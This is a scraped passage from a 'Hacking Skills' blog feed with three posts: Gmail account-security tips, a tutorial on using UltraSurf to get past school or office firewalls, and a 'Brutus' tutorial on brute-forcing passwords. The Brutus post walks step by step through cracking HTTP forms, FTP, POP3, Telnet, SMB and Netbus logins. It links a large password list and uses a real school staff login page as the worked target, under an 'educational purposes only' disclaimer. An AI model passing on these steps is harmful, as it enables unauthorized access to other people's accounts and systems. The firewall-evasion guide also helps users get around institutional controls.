src="http://images.maketecheasier.com/2010/05/gmail-fake-login-pages.png" style="display: block;" title="Check for Fake Login Pages of Gmail" width="535" /><br />Hence, always check that you are logging in to Gmail by typing www.gmail.com and not from any other URL.<br /><h3>2. Avoid checking Emails at Public Places</h3>A Keylogger is a computer program which can be used to record what you are typing in the keyboard. The Keylogger records your keystrokes, saves them in a simple text file and sends it to an email address or to an FTP server. And you are completely unaware of the whole process, running in the background.<br /><img alt="Keylogger programs used to record keystrokes from keyboard" class="aligncenter size-full wp-image-15888" height="272" src="http://images.maketecheasier.com/2010/05/gmail-keyloggers.jpg" style="display: block;" title="keyloggers" width="400" /><br />You never know which programs are installed in a public computer. Consider a simple scenario: You went to a local internet cafe to check emails from your Gmail account. The cafe staff has installed a Keylogger in every computer and when you type the username and password, the Keylogger script comes into action, records both your username and password and sends it to another email address. You leave the cafe after checking emails and the cafe staff retrieves your username and password and hacks your account.<br />Hence, never check emails at a local cafe or at public places or in any computer where you don’t have control.<br /><h3>3. Forward Emails to A Secondary Email account</h3>Should you need to check emails from a public computer or from a local internet cafe and you fear that the computer might have installed some keylogger programs? Here is a nice workaround.<br /><ul><li>Create another Gmail account and choose a different password for this account. This means that the password of your new Gmail account should not match with the password of your main Gmail account.</li><li>Log in to your main Gmail account, click “Settings” and go to the “Forwarding and POP/IMAP” tab.</li><li>Select the option to forward all incoming mails to your newly created Gmail account. Any email received in your primary email account will be forwarded to this secondary email address automatically.</li></ul><img alt="gmail-forward-emails" class="aligncenter size-full wp-image-15889" height="306" src="http://images.maketecheasier.com/2010/05/gmail-forward-emails.png" style="display: block;" title="Forward Emails to a New Gmail account" width="541" /><br />Whenever you want to check emails from a public computer, use this secondary email account. Anybody trying to hack your email account using a keylogger or a malicious program can hack this secondary email account but not your primary one. Obviously, do not leave any important emails or password/username in this temporary email account – keep deleting emails at regular intervals. Yes, this may sound ridiculous but it’s better to be on the safe side.<br /><b>VERY IMPORTANT:</b> Do not use or associate this secondary email account as a password recovery option of your primary email account. Use this email account just for checking emails at a public computer, that’s it.<br /><h3>4. Regularly Monitor Gmail Account Activity</h3>You can monitor the IP addresses of the computers used to log in to your Gmail account. To find the IP addresses, log in to Gmail, scroll down and click account activity details link as shown below:<br /><img alt="Gmail account activity details" class="aligncenter size-full wp-image-15892" height="544" src="http://images.maketecheasier.com/2010/05/gmail-account-activity.png" style="display: block;" title="Gmail account activity" width="560" /><br />This will show you a list of the last IP addresses used to log in to your Gmail account. You will notice the country and state name alongside date and time of your last Gmail activity. Should you find another unknown IP address or the name of a place, there are high chances that somebody else is logging in to your Gmail account from elsewhere.<br />To solve this issue, click the “Sign out of all other sessions” button and Gmail will automatically delete all the active sessions of your account. Next, immediately change the password from your Google accounts settings page.<br /><h3>5. Check for Bad Filters</h3>Gmail filters can be used to set rules in your Gmail account – you can automatically forward specific emails to another email account, delete it, archive it and do various other tasks. Sadly, filters can be a big threat to your Gmail account <a class="kLink" href="http://maketecheasier.com/7-ways-to-protect-your-gmail-account-from-getting-hacked/2010/05/23#" id="KonaLink1" style="position: static; text-decoration: underline ! important;" target="undefined"><span style="color: blue; font-family: verdana,sans-serif; font-size: 13px; font-weight: 400; position: static;"><span class="kLink" style="color: blue; font-family: verdana,sans-serif; font-size: 13px; font-weight: 400; position: static;">security</span></span></a>.<br />Consider a situation – you checked emails from your college computer, forgot to log out and left the classroom. One of your friends found that you have forgotten to log out and he applied a filter in your Gmail account. This filter automatically forwards all of your emails at his email address.<br />Now he has access to all your emails and he may reset your account password, if he wants.<br />Hence you should always check for unknown filters from <b>Gmail Settings -> Filters</b>. Delete any filter which you didn’t created or which appears suspicious.<br /><img alt="Check for unknown Gmail filters" class="aligncenter size-full wp-image-15895" height="227" src="http://images.maketecheasier.com/2010/05/gmail-filters.png" style="display: block;" title="Check for unknown Gmail filters" width="520" /><br /><h3>6. Do not Click on Suspicious Links</h3>There are some websites which let’s anyone send fake emails to any email address. And the worst part is that the sender can customize the “From” address to anything – noreply@gmail.com or gmailteam@google.com.<br />Consider a scenario: Mr X uses some website and sends an email to you asking you to change your Gmail password due to security reasons. You see the from address field as something like “support@gmail.com” and think that it’s from Gmail. No, it’s not.<br />When you receive any emails which asks you to change your account password or enter login credentials, STOP. Do not ever click on any suspicious links from your inbox.<br /><img alt="Suspicious links in Gmail account" class="aligncenter size-full wp-image-15897" height="373" src="http://images.maketecheasier.com/2010/05/gmail-suspicious-links.png" style="display: block;" title="Suspicious Links in Gmail account" width="550" /><br /><b>Note</b>: <i>Gmail will never ask you to change your password or enter login credentials without any reason. Hence, if you receive any email which claims to be from Google and wants you to change your password, be rest assured someone is trying to fool you and hack your email account.</i><br /><h3>7. Choose a Strong Alphanumeric password</h3>Most users choose very generic passwords which can be easily guessed. You should always choose a very strong password which is difficult to guess. Always remember the following tips regarding choosing passwords:<br /><ul><li>Choose both numbers and alphabets in your password. It would be even better if you include symbols and special characters.</li><li>Never use your phone number, parents name or credit card number as your email account password.</li><li>Choose a long password – probably more than 10 characters.</li><li>Never write your password on paper or save it as a text document in your computer.</li></ul>Anyone trying to hack your email account will have a difficult time guessing the password and the more complicated your password, the more secure and better it is. You should also <a href="http://maketecheasier.com/recover-google-password-via-sms/2009/12/04">connect your mobile number with your Gmail account</a>. This is required in case your forget the password and can’t login to Gmail.Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com1tag:blogger.com,1999:blog-289744729559414161.post-53611157715279851212010-11-05T23:01:00.000-07:002011-06-27T20:13:52.754-07:00How To Bypass Firewall Using Tool<h3 class="post-title entry-title"> </h3><div class="post-header"> </div><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;">Is Orkut, Facebook,Yahoo blocked on your school, college or office? Then, don't worry. I have a solution for you that will not only unblock all the websites that have been blocked but also make your internet surfing anonymous so that nobody can trace your orignal ip address. As you know that most of the proxy websites are blocked with your school, college or office firewall and even if you find some new proxies they even them block them out. So,why not to move something that is almost a permanent solution.</span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;">We will be using a very small and free software called ultrasurf. It will not only allow you to surf blocked websites but it will also give you freedom to stream videos, download and upload files.</span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><span style="font-weight: bold;">Here is the step by step tutorial with screenshots:</span></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;">1. First you need to</span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"> </span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><a href="http://www.ultrareach.com/" style="color: #a91b33; text-decoration: none;"><span style="font-weight: bold;">Download Ultrasurf</span></a></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;">.</span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;">2. You will get a zipped file with a .exe file in it. Click on it</span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;">3. It will start ultra surf and automatically connect to its server.</span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><a href="http://2.bp.blogspot.com/_F7GuXCzPQdY/TM90k72NuGI/AAAAAAAAE4Y/Lel5AlcH8tY/s1600/0427011.jpg" style="color: #a91b33; text-decoration: none;"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5534770644950825058" src="http://2.bp.blogspot.com/_F7GuXCzPQdY/TM90k72NuGI/AAAAAAAAE4Y/Lel5AlcH8tY/s400/0427011.jpg" style="border-width: 0px; cursor: pointer; display: block; height: 268px; margin: 0px auto 10px; padding: 10px; text-align: center; width: 380px;" /></a></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;">4. Even it will open your Internet explorer automatically. Now you can have an unblocked and secure to internet.</span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;">5. If you want to use ultrasurf on Firefox, you need to download the firefox plugin too:</span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"> </span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><a href="http://www.ultrareach.com/download_en.htm" style="color: #a91b33; text-decoration: none;"><span style="font-weight: bold;">download here</span></a></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;">If you are connected to internet through a proxy server then ultrasurf will detect it. If somehow it does not detect the proxy server then you can manually enter your proxy server</span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;">To manually enter proxy server</span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;">Click on</span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"> </span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><span style="font-weight: bold;">Option > Proxy Setting > Manual Proxy Settings</span></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><a href="http://1.bp.blogspot.com/_F7GuXCzPQdY/TM91RlWtM_I/AAAAAAAAE4g/yoFpbq-2LKo/s1600/0427012.jpg" style="color: #a91b33; text-decoration: none;"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5534771412007203826" src="http://1.bp.blogspot.com/_F7GuXCzPQdY/TM91RlWtM_I/AAAAAAAAE4g/yoFpbq-2LKo/s400/0427012.jpg" style="border-width: 0px; cursor: pointer; display: block; height: 326px; margin: 0px auto 10px; padding: 10px; text-align: center; width: 291px;" /></a></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><a href="http://3.bp.blogspot.com/_F7GuXCzPQdY/TM91aqrrgtI/AAAAAAAAE4o/N-DQlEmyjOU/s1600/0427013.jpg" style="color: #a91b33; text-decoration: none;"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5534771568056173266" src="http://3.bp.blogspot.com/_F7GuXCzPQdY/TM91aqrrgtI/AAAAAAAAE4o/N-DQlEmyjOU/s400/0427013.jpg" style="border-width: 0px; cursor: pointer; display: block; height: 281px; margin: 0px auto 10px; padding: 10px; text-align: center; width: 269px;" /></a></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><span style="font-weight: bold;">Note:</span></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"> </span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;">If you want to use ultrasurf with other applications you need to configure them to use ultrasurf as their proxy client. The Proxy IP address is 127.0.0.1 and the Port is 9666.</span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"> </span>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com0tag:blogger.com,1999:blog-289744729559414161.post-17111435063932013192010-10-02T19:36:00.000-07:002011-06-27T20:13:52.754-07:00Learn Brutus Tutorial<h3 class="post-title entry-title"> <a href="http://hackguide4u.blogspot.com/2010/10/brutus-tutorial-on-how-to-use-it.html"><br /></a> </h3><div class="post-header"> </div><a href="http://f.imagehost.org/0989/2_9.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="146" src="http://f.imagehost.org/0989/2_9.jpg" width="200" /></a><b>How to use Brute Force Attack<br /><br />Written by: ALEX================================================== ========<br />I, The alex, take no responsibilty for what you do with the information<br />that I am providing for you. This information is for educational purposes only.<br />================================================== ========<br /><br />Chapter 1: Introduction to Brutus.<br /><br />1.What is Brutus?<br /><br />2.What can I do with it?<br /><br />3 Where can I download Brutus?<br /><br />4.Where can I find a good password list?<br /><br /><br />Chapter Two: Let's Get Crackin'.<br /><br />1.HTTP Form.<br /><br />2.FTP.<br /><br />3.POP3<br /><br />4.Telnet.<br /><br />5.SMB (Netbios)<br /><br />6.Netbus<br /><br />7.Custom.<br /><br />Chapter Three: Wrapping up.<br /><br />1.Contact Information.<br />========================================<br />Chapter One.<br /><br />==What is Brutus?==<br /><br />Brutus is a well known password brute forcing program.<br /><br />==What can I do with it?==<br /><br />With Brutus, you can brute force passwords for HTTP, FTP, POP3, Telnet, SMB (Netbios), Netbus, and they also have a<br />"Custom" option so you can specify your own settings.<br /><br />==Where can I download Brutus?==<br />You can find Brutus at it's webpage <a href="http://www.hoobie.net/brutus" target="_blank">www.hoobie.net/brutus</a><br />You can also find it at GluTuk's site <a href="http://www.spartandownloads.2ys.com/" target="_blank">www.spartandownloads.2ys.com</a><br /><br />==Where can I find a good password list to use with Brutus?==<br />Pretty much, the only password list you will ever need<br />and has 4.9 million passwords. Here are a link where you can download it.<br /><br />Part 1.<br /><a href="http://area51archives.com/files/pass_list.rar">http://area51archives.com/files/pass_list.rar</a><br /><br />Part 2<br /><a href="http://area51archives.com/files/pass_list.rar">http://area51archives.com/files/pass_list.rar</a><br /><br />================================================== ============<br /><br />Chapter Two: Let's Get Crackin'.<br /><br />Note: You can use a proxy for each cracking method.<br /><br />==HTTP Form==<br /><br />This is the option you would use if you want to crack into a website that has a field for a username and a pass, like<br />this one.<br /><br /><a href="http://www.westbranch.k12.oh.us/staff/controls.asp" target="_blank">http://www.westbranch.k12.oh.us/staff/controls.asp</a><br /><br />I will use this site for the rest ov this section as well.<br /><br />First thing you wanna do is open Brutus, and select http form. Then click the modify sequence button. Once there we put<br />the above link into the Target form field, then click Learn Form Settings<br />From here, you click the field name that is for the username, in this case it is userid, once you have selected it,<br />click the username button that is shown above the cookie information. That tells brutus that that field is for the username.<br />Then you select the password field and click the password button, then click accept. Next, in the HTML Response field you<br />need to fill that in with the response you get when you try to enter a password into your site. In this case the response is<br />"You have entered a wrong Password or username." For this target we will put that into the Primary response field Once this<br />is done, we click ok, add the IP into the Target Field and start our crack.<br /><br />==FTP==<br /><br />For cracking an FTP server, the default settings should remain how they are, I usually make sure that the "Try to stay<br />connected for unlimited attempts" box is ticked.Thats up to you, once you have selected your options, enter the IP and<br />being the crack.<br /><br />==POP3==<br /><br />This is pretty much the same as FTP cracking as far as, the default settings should work for you. Once again, I like to<br />use the "Try to stay connected for unlimited attempts" option.<br /><br />==Telnet==<br /><br />Seems as if I'm repeating myself, but once again, the default settings should werk for you.<br /><br />==SMB (Netbios)==<br /><br />If you happen to find yourself a target that has the netbios port open (139) and has sharing enabled, but needs a<br />password, this is what you would use. Once again, default settings should werk.<br /><br />==Netbus==<br /><br />Netbus is a popular trojan that sometimes, you might find a server that needs a password to connect.<br />This option is used for, cracking a password protected Netbus server.<br /><br />==Custom==<br /><br />This is what you would use to set up a crack for anything else that you could think ov.You need to find out what you need<br />to put in each field once you click "Define sequence" Those options will vary from target to target.</b><br /><div style="color: white;"><b><span style="font-size: xx-small;">......................................................................................................................................................... ...............................................................</span></b></div>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com1